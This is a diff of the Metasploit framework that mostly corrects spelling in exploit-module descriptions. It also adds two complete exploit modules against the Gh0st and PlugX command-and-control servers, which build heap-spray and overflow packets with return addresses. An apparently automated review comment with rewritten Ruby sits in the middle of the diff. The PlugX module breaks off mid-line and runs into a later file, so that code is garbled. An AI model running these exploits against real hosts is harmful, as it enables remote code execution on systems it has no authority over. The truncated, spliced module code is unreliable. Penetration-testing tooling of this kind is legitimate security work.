@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), - which may result aribitrary remote code execution under the context of 'SYSTEM'. + which may result in arbitrary remote code execution under the context of 'SYSTEM'. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 645794b5c6..746a121ef7 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTTPDX tolog() Function Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in HTTPDX HTTP server. - By sending an specially crafted HTTP request containing format specifiers, an + By sending a specially crafted HTTP request containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index bc3ba93485..f66d395af2 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb 
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerable. The administration web page on port 18881 is vulnerable to a remote buffer overflow - attack. By sending an long character string in the password field, both the structured + attack. By sending a long character string in the password field, both the structured exception handler and the saved extended instruction pointer are over written, allowing an attacker to gain control of the application and the underlying operating system remotely. diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 2b08f0b2f8..f7c5ee3a5d 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a remote buffer overflow in the MailEnable web service. The vulnerability is triggered when a large value is placed into the Authorization - header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and + header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and MailEnable Professional versions prior to 1.55 are affected. }, 'Author' => 'David Maciejak ', diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index fa47aa5c65..ba31ebb651 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account - has a default password of "plugin" which can not be reset through the user interface. By + has a default password of "plugin" which cannot be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows. diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index 76bd9fdf3e..fbfbf9858a 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super( 'Name' => 'ManageEngine Applications Manager Authenticated Code Execution', 'Description' => %q{ - This module logs into the Manage Engine Appplications Manager to upload a + This module logs into the Manage Engine Applications Manager to upload a payload to the file system and a batch script that executes the payload. }, 'Author' => 'Jacob Giannantonio ', 'Platform' => 'win', diff --git a/modules/exploits/windows/http/octopusdeploy_deploy.rb b/modules/exploits/windows/http/octopusdeploy_deploy.rb index e95b94becf..bba2efb29f 100644 --- a/modules/exploits/windows/http/octopusdeploy_deploy.rb +++ b/modules/exploits/windows/http/octopusdeploy_deploy.rb 
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Octopus Deploy Authenticated Code Execution', 'Description' => %q{ This module can be used to execute a payload on an Octopus Deploy server given - valid credentials or an API key. The payload is execued as a powershell script step + valid credentials or an API key. The payload is executed as a powershell script step on the Octopus Deploy server during a deployment. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 97eb75ca15..01c368907f 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote root. If a new Domain has been used to deploy the Oracle application, the Windows Management Instrumentation service can be used to execute arbitrary code. - Both techniques has been successfully tested on default installs of Oracle BTM + Both techniques have been successfully tested on default installs of Oracle BTM 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are provided, but the user can configure the traversal depth using the DEPTH option. }, diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index ab0e9270ce..b99da301e1 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability', 'Description' => %q{ This module exploits an authentication bypass vulnerability - in login.php. In conjuction with the authentication bypass issue, + in login.php. In conjunction with the authentication bypass issue, the 'jlist' parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0 diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index 7adce23a2f..9225f81aea 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt - generally causes a thread to die whether sucessful or not. Therefore, in a default + generally causes a thread to die whether successful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index ca29fef445..a0c48c7bd0 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module can be used to execute a payload on Umbraco CMS 4.7.0.378. The payload is uploaded as an ASPX script by sending a specially crafted - SOAP request to codeEditorSave.asmx, which permits unauthorised file upload + SOAP request to codeEditorSave.asmx, which permits unauthorized file upload via the SaveDLRScript operation. SaveDLRScript is also subject to a path traversal vulnerability, allowing code to be placed into the web-accessible /umbraco/ directory. diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 972f64f4c3..57e7ed96e9 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against - Windows NT 4 Service Packs 3, 4, and 5. The server will + Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 1c9e9173d9..99719ef8e1 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'IMail IMAP4D Delete Overflow', 'Description' => %q{ This module exploits a buffer overflow in the 'DELETE' - command of the the IMail IMAP4D service. This vulnerability + command of the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. }, 
diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index ec6af0305e..e5a7a49317 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Novell NetMail IMAP STATUS Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS + This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. }, diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index bc7c633104..48533a760f 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Computer Associates License Client GETCONFIG Overflow', 'Description' => %q{ - This module exploits an vulnerability in the CA License Client + This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index facf89531c..4665dd436d 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Local super(update_info(info, 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{ - This module will generate a .NET service executable on the target and utilise + This module will generate a .NET service executable on the target and utilize InstallUtil to run the payload bypassing the AppLocker protection. Currently only the InstallUtil method is provided, but future methods can be diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 442c7cfc5e..42dd874d1f 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -22,11 +22,11 @@ class MetasploitModule < Msf::Exploit::Local This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection - technique to drop only the DLL payload binary instead of three seperate + technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting - your payload in a seperate process. + your payload in a separate process. }, 'License' => MSF_LICENSE, 'Author' => [ diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index 42fbe5dfd3..f195409a4f 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb 
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'Windows SYSTEM Escalation via KiTrap0D', 'Description' => %q{ This module will create a new session with SYSTEM privileges via the - KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already + KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. }, diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 33e7621dab..04c5b66dd2 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload - into another SYSTEM process before restoring it's own token to + into another SYSTEM process before restoring its own token to avoid causing system instability. ), 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index d57baf0588..e56aac1e70 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb 
@@ -35,8 +35,8 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow', 'Description' => %q{ This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing - a malformed font. The vulnerability was exploited by the hacking team and disclosed on - the july data leak. This module has been tested successfully on vulnerable builds of + a malformed font. The vulnerability was exploited by the hacking team and disclosed in + the July data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/ms16_016_webdav.rb b/modules/exploits/windows/local/ms16_016_webdav.rb index c9db432e06..2eca69259a 100644 --- a/modules/exploits/windows/local/ms16_016_webdav.rb +++ b/modules/exploits/windows/local/ms16_016_webdav.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation', 'Description' => %q{ This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn - a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing + a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/panda_psevents.rb b/modules/exploits/windows/local/panda_psevents.rb index bb3bb2c098..02af138582 100644 --- a/modules/exploits/windows/local/panda_psevents.rb +++ b/modules/exploits/windows/local/panda_psevents.rb 
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local Vulnerable Products: Panda Global Protection 2016 (<=16.1.2) Panda Antivirus Pro 2016 (<=16.1.2) - Panda Small Busines Protetion (<=16.1.2) + Panda Small Business Protection (<=16.1.2) Panda Internet Security 2016 (<=16.1.2) }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb index a590cf92b9..f920dd58c1 100644 --- a/modules/exploits/windows/local/run_as.rb +++ b/modules/exploits/windows/local/run_as.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Local 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default. - Unless targetting a local user either set the DOMAIN, or specify a UPN user + Unless targeting a local user either set the DOMAIN, or specify a UPN user format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function. A custom command line can be sent instead of uploading an executable. diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 4879a2fcd6..e3ff6051ab 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a sequence of specially crafted rendering messages, a virtual machine can exploit an out of bounds array access to corrupt memory and escape to the host. This module has been - tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. + tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. }, 'License' => MSF_LICENSE, 'Author' => 
diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb index bcb068b3c3..bf28f0ed4f 100644 --- a/modules/exploits/windows/local/wmi_persistence.rb +++ b/modules/exploits/windows/local/wmi_persistence.rb @@ -27,8 +27,8 @@ class MetasploitModule < Msf::Exploit::Local The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method - creates an event filter that utilises the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER - before executing the payload. The signal can be sent from a windows host on a LAN utilising the waitfor.exe command + creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER + before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations. diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index c1dd455671..3ff96f380f 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in WinComLPD <= 3.0.2. By sending an overly long authentication packet to the remote - adminstration service, an attacker may be able to execute arbitrary + administration service, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb index 60cf970353..e38ec9cb95 100644 --- a/modules/exploits/windows/misc/allmediaserver_bof.rb +++ b/modules/exploits/windows/misc/allmediaserver_bof.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote is caused due to a boundary error within the handling of HTTP request. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't - reliable across virtual (VMWare, VirtualBox) and physical environments. Because of + reliable across virtual (VMWare, VirtualBox) and physical environments. Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP. }, diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index f9896581b1..479d87bde5 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote command. Additionally the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload. - The module uses uses the Windows Management Instrumentation service to execute an + The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2. diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 4207c36860..835342afca 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phases - stackpivot allows to execute the ROP chain which ultimately is used to execute + stack pivot allows to execute the ROP chain which ultimately is used to execute VirtualAlloc and bypass DEP. }, 'Author' => 'Spencer McIntyre', diff --git a/modules/exploits/windows/misc/gh0st.rb b/modules/exploits/windows/misc/gh0st.rb new file mode 100644 index 0000000000..f4a8ff1734 --- /dev/null +++ b/modules/exploits/windows/misc/gh0st.rb 
@@ -0,0 +1,127 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Gh0st Client buffer Overflow', + 'Description' => %q{ + This module exploits a Memory buffer overflow in the Gh0st client (C2 server) + }, + 'Author' => 'Professor Plum', + 'License' => MSF_LICENSE, + 'References' => + [ + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'AllowWin32SEH' => true + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => '', + 'EncoderType' => Msf::Encoder::Type::AlphanumMixed + }, + 'Platform' => 'win', + 'DisclosureDate' => 'Jul 27 2017', + 'Targets' => + [ + ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }] + ], + 'Privileged' => false, + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']), + Opt::RPORT(80) + ] + ) + end + + def make_packet(id, data) + msg = id.chr + data + compressed = Zlib::Deflate.deflate(msg) + datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed + end + + def validate_response(data) + if data.nil? + print_status('Server closed connection') + return false + end + if data.empty? 
+ print_status('No response recieved') + return false + end + if data.size < 13 + print_status('Invalid packet') + print_status(data) + return false + end + mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV') + if mag.index(datastore['MAGIC']) != 0 + print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size]) + return false + end + if pktlen != data.size + print_status('Packet size mismatch') + return false + end + msg = Zlib::Inflate.inflate(data[13..data.size]) + if msg.size != msglen + print_status('Packet decompress failure') + return false + end + return true + end + + def check + connect + sock.put(make_packet(101, "\x00")) # heartbeat + if validate_response(sock.get_once || '') + return Exploit::CheckCode::Appears + end + Exploit::CheckCode::Safe + end + + def exploit + print_status("Trying target #{target.name}") + print_status('Spraying heap...') + for i in 0..100 + connect + sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded)) + if not validate_response(sock.get_once) + disconnect + return + end + end + + for i in 103..107 + print_status("Trying command #{i}...") + begin + connect + sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28) + sock.put(sploit) + if validate_response(sock.get_once) + next + end + sleep(0.1) + break + rescue EOFError + print_status('Invalid') + end + end + handler + disconnect + end +end diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index 2bab2f7f54..a5accdcda6 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb 
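Review bot: validate_response and make_packet hard-code the 13-byte header (5-byte MAGIC plus two 32-bit lengths) while MAGIC is a user-settable option, so a MAGIC of any other length silently misframes every packet; either derive the header length as `datastore['MAGIC'].size + 8` in both methods or reject other lengths in `initialize`. `Zlib::Inflate.inflate` on the server's reply is not rescued, so a malformed or hostile response raises `Zlib::DataError` out of `check` and `exploit` instead of returning false, and `print_status(data)` writes raw bytes from the remote peer to the console where `data.inspect` would be safe. `mag[0..datastore['MAGIC'].size]` also prints one byte past the magic, and the message `'No response recieved'` is misspelled. The `for i in 0..100` and `for i in 103..107` loops in exploit would read better as `101.times` and `(103..107).each`, and `if not validate_response(...)` as `unless`. A rewritten tail of validate_response follows.
```ruby
  def validate_response(data)
    # … unchanged: nil / empty guards …
    hdr_len = datastore['MAGIC'].size + 8
    if data.size < hdr_len
      print_status('Invalid packet')
      print_status(data.inspect)
      return false
    end
    mag, pktlen, msglen = data[0, hdr_len].unpack("a#{datastore['MAGIC'].size}VV")
    if mag != datastore['MAGIC']
      print_status("Bad magic: #{mag.inspect}")
      return false
    end
    if pktlen != data.size
      print_status('Packet size mismatch')
      return false
    end
    begin
      msg = Zlib::Inflate.inflate(data[hdr_len..-1])
    rescue Zlib::Error => e
      print_status("Packet decompress failure: #{e.message}")
      return false
    end
    msg.size == msglen
  end
```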
@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary - commands can be execute by sending crafted requests with opcode 28 to the OmniInet - service listening on the TCP/5555 port. Since there is an strict length limitation on + commands can be executed by sending crafted requests with opcode 28 to the OmniInet + service listening on the TCP/5555 port. Since there is a strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. diff --git a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb index 49af5167d8..6b0fedbc0d 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service', 'Description' => %q{ - This module exploits HP Data Protector Omniinet process on Windows only. + This module exploits HP Data Protector OmniInet process on Windows only. This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index e15d95d86d..109d5a403a 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Hewlett-Packard + This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index 0a9834f53b..301d921fc3 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 - By creating a specially crafted pls file, an an attacker may be able + By creating a specially crafted pls file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/misc/plugx.rb b/modules/exploits/windows/misc/plugx.rb new file mode 100644 index 0000000000..200f732c57 --- /dev/null +++ b/modules/exploits/windows/misc/plugx.rb 
@@ -0,0 +1,171 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PlugX Controller Stack Overflow', + 'Description' => %q{ + This module exploits a Stack buffer overflow in the PlugX Controller (C2 server) + }, + 'Author' => 'Professor Plum', + 'License' => MSF_LICENSE, + 'References' => + [ + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'AllowWin32SEH' => true + }, + 'Payload' => + { + 'Space' => 0xe000, + 'BadChars' => '', + 'EncoderType' => Msf::Encoder::Type::AlphanumMixed + }, + 'Platform' => 'win', + 'DisclosureDate' => 'Jul 27 2017', + 'Targets' => + [ + ['PlugX Type I (old)', { 'xor' => 0, 'callebp' => 0x004045c4 }], + ['PlugX Type I', { 'xor' => 1, 'callebp' => 0x004045c4 }], + ['PlugX Type II', { 'xor' => 2, 'callebp' => 0x004045c4 }] + ], + 'Privileged' => false, + 'DefaultTarget' => 2) + ) + + register_options( + [ + Opt::RPORT(13579) + ] + ) + end + + def xor_stream1(key, src) + key0 = key1 = key2 = key3 = key + dst = '' + for i in 0..(src.size - 1) + key0 = (key0 + (key0 >> 3) - 0x11111111) & 0xFFFFFFFF + key1 = (key1 + (key1 >> 5) - 0x22222222) & 0xFFFFFFFF + key2 = (key2 + 0x44444444 - (key2 << 9)) & 0xFFFFFFFF + key3 = (key3 + 0x33333333 - (key3 << 7)) & 0xFFFFFFFF + new_key = (key2 + key3 + key1 + key0) & 0xFF + res = src[i].ord ^ new_key + dst += res.chr + end + dst + end + + def xor_stream1a(key, src) + key0 = key1 = key2 = key3 = key + dst = '' + for i in 0..(src.size - 1) + key0 = (key0 + (key0 >> 3) + 3) & 0xFFFFFFFF + key1 = (key1 + (key1 >> 5) + 5) & 0xFFFFFFFF + key2 = (key2 - 7 - (key2 << 9)) & 0xFFFFFFFF + key3 = (key3 - 9 - (key3 << 7)) & 0xFFFFFFFF + new_key = (key2 + key3 + key1 + key0) & 0xFF + res = src[i].ord ^ new_key + dst += res.chr + 
end + dst + end + + def xor_stream2(key, data) + dst = '' + for i in 0..(data.size - 1) + key = (((key << 7) & 0xFFFFFFFF) - ((key >> 3) & 0xFFFFFFFF) + i + 0x713A8FC1) & 0xFFFFFFFF + dst += ((key & 0xFF) ^ ((key >> 8) & 0xFF) ^ ((key >> 16) & 0xFF) ^ data[i].ord ^ ((key >> 24) & 0xFF)).chr + end + dst + end + + def xor_wrap(key, data) + if target['xor'] == 0 + return xor_stream1a(key, data) + elsif target['xor'] == 1 + return xor_stream1(key, data) + elsif target['xor'] == 2 + return xor_stream2(key, data) + end + print_status('Unknown PlugX Type') + end + + def validate_response(data) + if data.nil? + print_status('Server closed connection') + return false + end + if data.empty? + print_status('No response recieved') + return false + end + if data.size < 16 + print_status('Invalid packet') + print_status(data.inspect) + return false + end + key = data[0..4].unpack(' "SPlayer 3.7 Content-Type Buffer Overflow", 'Description' => %q{ - This module exploits a vulnerability in SPlayer v3.7 or piror. When SPlayer + This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer requests the URL of a media file (video or audio), it is possible to gain arbitrary remote code execution due to a buffer overflow caused by an exceeding length of data as the 'Content-Type' parameter. diff --git 